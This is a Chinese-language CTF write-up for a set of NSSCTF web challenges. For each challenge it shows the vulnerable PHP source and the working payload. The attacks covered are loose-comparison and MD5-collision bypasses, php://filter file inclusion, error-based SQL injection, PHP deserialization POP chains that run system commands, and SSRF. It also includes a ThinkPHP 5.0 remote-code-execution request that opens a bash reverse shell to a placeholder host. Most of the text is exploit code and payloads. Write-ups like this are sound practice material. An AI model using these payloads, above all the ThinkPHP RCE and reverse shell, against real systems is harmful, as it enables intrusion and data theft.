funny_web
访问rea11y.php得到源码
<?php
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
highlight_file(__FILE__);
include('flag.php');
if (isset($_GET['num'])) {
$num = $_GET['num'];
if ($num != '12345') {
if (intval($num) == '12345') {
echo $FLAG;
}
} else {
echo "这为何相等又不相等";
}
}
直接传参?num=12345a获得flag
奇妙的MD5
请求头包含hint,直接使用特殊的md5绕过登陆ffifdyop
接着数组绕过就行,?x[]=1&y[]=2
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['wqh']!==$_POST['dsy']&&md5($_POST['wqh'])===md5($_POST['dsy'])){
echo $FLAG;
}
where_am_i
给了一张图片,提示什么是11位,果断猜测是图中的手机号,直接百度识图一把梭
直接搜索酒店联系方式
访问ending.php直接拿到flag
ez_ez_php
源码
<?php
error_reporting(0);
if (isset($_GET['file'])) {
if ( substr($_GET["file"], 0, 3) === "php" ) {
echo "Nice!!!";
include($_GET["file"]);
}
else {
echo "Hacker!!";
}
}else {
highlight_file(__FILE__);
}
//flag.php
文件包含 php伪协议没什么好说的
webdog1__start
md5绕过,用一个nd5前后都是0e开头的特殊payload就行0e215962017
https://blog.csdn.net/CSDNiamcoming/article/details/108837347
访问start.php看到这里的注释内容,提示bot,访问robots.txt
该死的套娃
接着是一个先知长度的命令执行,以及一个关键词过滤,非常简单
F1l1l1l1l1lag.php?get=echo%09`nl%09/fla*`;
Ez_upload
限制MIME类型为jpg,然后文件内容过滤了<?,可以使用.htaccess配合php伪协议编码绕过
接着访问1.jpg,flag直接就在环境变量,看了一下/flag是有权限的,不知道是不是想搞个一个提权,结果忘删了环境变量了
numgame
不让查看源代码,直接手动在url前面加上view-source:
前缀
然后再1.js中找到套娃线索,NsScTf.php
源码
<?php
error_reporting(0);
//hint: 与get相似的另一种请求协议是什么呢
include("flag.php");
class nss{
static function ctf(){
include("./hint2.php");
}
}
if(isset($_GET['p'])){
if (preg_match("/n|c/m",$_GET['p'], $matches))
die("no");
call_user_func($_GET['p']);
}else{
highlight_file(__FILE__);
}
接着就是调用类的静态方法的方法,类名::方法名 ,然后使用php对类名方法名大小写不敏感进行绕过关键词
最后拿到flag
ez_ez_php(revenge)
<?php
error_reporting(0);
if (isset($_GET['file'])) {
if ( substr($_GET["file"], 0, 3) === "php" ) {
echo "Nice!!!";
include($_GET["file"]);
}
else {
echo "Hacker!!";
}
}else {
highlight_file(__FILE__);
}
//flag.php
file=php://filter/convert.base64-encode/resource=/flag
ez_rce
访问robots.txt得到提示/NSS/index.php
发现是TP5.0,直接网上拿payload打
NSS/index.php?s=captcha
_method=__construct&filter[]=system&method=get&get[]=bash -c "bash -i >%26 /dev/tcp/xxx/2333 0>%261"
发现需要提权,suid没有找到,env里面也没有
flag在/nss/ctf/flag/flag
下
ez_sql
post传参,然后报错注入,flag在NSS_tb表下的Secr3t字段
nss=1'/**/%26%26/**/updatexml(1,concat(0x7e,(select/**/substr(group_concat(Secr3t),30,20)/**/from/**/NSS_tb),0x7e),1)%23
NSS_db
NSS_tb,users
id,Secr3t,flll444g
id,username,password,USER,CURRENT_CONNECTION,TOTAL_CONNECTIONS
NSSCTF{c5c9aeda-560a-425b-ae7a-eaef3e4561bb}
ez_1zpop
源码:
<?php
error_reporting(0);
class dxg
{
function fmm()
{
return "nonono";
}
}
class lt
{
public $impo='hi';
public $md51='weclome';
public $md52='to NSS';
function __construct()
{
$this->impo = new dxg;
}
function __wakeup()
{
$this->impo = new dxg;
return $this->impo->fmm();
}
function __toString()
{
if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
return $this->impo->fmm();
}
function __destruct()
{
echo $this;
}
}
class fin
{
public $a;
public $url = 'https://www.ctfer.vip';
public $title;
function fmm()
{
$b = $this->a;
$b($this->title);
}
}
if (isset($_GET['NSS'])) {
$Data = unserialize($_GET['NSS']);
} else {
highlight_file(__file__);
}
非常常规的反序列化,直接修改lt:3
为lt:4
绕过wakeupRCE
<?php
class lt
{
public $impo;
public $md51='QNKCDZO';
public $md52='240610708';
}
class fin
{
public $a='system';
public $title='cat /flag';
}
$l = new lt();
$l2 = new lt();
$fin = new fin();
$l->impo=$fin;
echo serialize($l);
1z_unserialize
源码:
<?php
class lyh{
public $url = 'NSSCTF.com';
public $lt;
public $lly;
function __destruct()
{
$a = $this->lt;
$a($this->lly);
}
}
unserialize($_POST['nss']);
highlight_file(__FILE__);
?>
<?php
class lyh{
public $url;
public $lt='system';
public $lly='cat /flag';
function __destruct()
{
$a = $this->lt;
$a($this->lly);
}
}
echo serialize(new lyh);
xff
GET / HTTP/1.1
Host: 1.14.71.254:28053
User-Agent: Xiaohong
Referer: Home Page
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1
Upgrade-Insecure-Requests: 1
js_sign
webmisc题
document.getElementsByTagName("button")[0].addEventListener("click", ()=>{
flag = "33 43 43 13 44 21 54 34 45 21 24 33 14 21 31 11 22 12 54 44 11 35 13 34 14 15"
if (btoa(flag.value) == 'dGFwY29kZQ==') {
alert("you got hint!!!");
} else {
alert("fuck off !!");
}
}
)
dGFwY29kZQ==
解码为tapcode,将flag进行解码
拿到flag:NSSCTF{youfindflagbytapcode}
ez_ez_unserialize
源码
<?php
class X
{
public $x = __FILE__;
function __construct($x)
{
$this->x = $x;
}
function __wakeup()
{
if ($this->x !== __FILE__) {
$this->x = __FILE__;
}
}
function __destruct()
{
highlight_file($this->x);
//flag is in fllllllag.php
}
}
if (isset($_REQUEST['x'])) {
@unserialize($_REQUEST['x']);
} else {
highlight_file(__FILE__);
}
exp
<?php
class X
{
public $x = "fllllllag.php";
}
$a = serialize(new X());
echo $a;
?x=O:1:"X":3:{s:1:"x";s:13:"fllllllag.php";}
funny_php
http://1.14.71.254:28247/?num=9e9&str=NSSNSSCTFCTF
md5_1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&md5_2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
Power!
源码
<?php
class FileViewer{
public $black_list = "flag";
public $local = "http://127.0.0.1/";
public $path;
public function __call($f,$a){
$this->loadfile();
}
public function loadfile(){
if(!is_array($this->path)){
if(preg_match("/".$this->black_list."/i",$this->path)){
$file = $this->curl($this->local."cheems.jpg");
}else{
$file = $this->curl($this->local.$this->path);
}
}else{
$file = $this->curl($this->local."cheems.jpg");
}
echo '<img src="data:jpg;base64,'.base64_encode($file).'"/>';
}
public function curl($path){
$url = $path;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_HEADER, 0);
$response = curl_exec($curl);
curl_close($curl);
return $response;
}
public function __wakeup(){
$this->local = "http://127.0.0.1/";
}
}
class Backdoor{
public $a;
public $b;
public $superhacker = "hacker.jpg";
public function goodman($i,$j){
$i->$j = $this->superhacker;
}
public function __destruct(){
$this->goodman($this->a,$this->b);
$this->a->c();
}
}
if(isset($_GET['source'])){
highlight_file(__FILE__);
}else{
if(isset($_GET['image_path'])){
$path = $_GET['image_path']; //flag in /flag.php
if(is_string($path)&&!preg_match("/http:|gopher:|glob:|php:/i",$path)){
echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
}else{
echo '<h2>Seriously??</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents("cheems.jpg")).'"/>';
}
}else if(isset($_GET['path_info'])){
$path_info = $_GET['path_info'];
$FV = unserialize(base64_decode($path_info));
$FV->loadfile();
}else{
$path = "vergil.jpg";
echo '<h2>POWER!!</h2>
<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
}
}
?>
反序列化
exp
<?php
class FileViewer
{
public $black_list='1';
public $local;
public $path='';
}
class Backdoor
{
public $a;
public $b;
public $superhacker;
}
$f = new FileViewer();
$b= new Backdoor();
$b->superhacker='http://127.0.0.1:65500?image_path=flag.php';
$b->b='local';
$b->a=$f;
$p = [$b,''];
$final = serialize($p);
// echo $final."<br>";
$final = str_replace('i:1;s:0:','i:0;s:0:',$final);
echo base64_encode($final);
file_master
源码
<?php
session_start();
if(isset($_GET['filename'])){
echo file_get_contents($_GET['filename']);
}
else if(isset($_FILES['file']['name'])){
$whtie_list = array("image/jpeg");
$filetype = $_FILES["file"]["type"];
if(in_array($filetype,$whtie_list)){
$img_info = @getimagesize($_FILES["file"]["tmp_name"]);
if($img_info){
if($img_info[0]<=20 && $img_info[1]<=20){
if(!is_dir("upload/".session_id())){
mkdir("upload/".session_id());
}
$save_path = "upload/".session_id()."/".$_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"],$save_path);
$content = file_get_contents($save_path);
if(preg_match("/php/i",$content)){
sleep(5);
@unlink($save_path);
die("hacker!!!");
}else{
echo "upload success!! upload/your_sessionid/your_filename";
}
}else{
die("image hight and width must less than 20");
}
}else{
die("invalid file head");
}
}else{
die("invalid file type!image/jpeg only!!");
}
}else{
echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents("welcome.jpg")).'">';
}
?>
1 条评论
太强了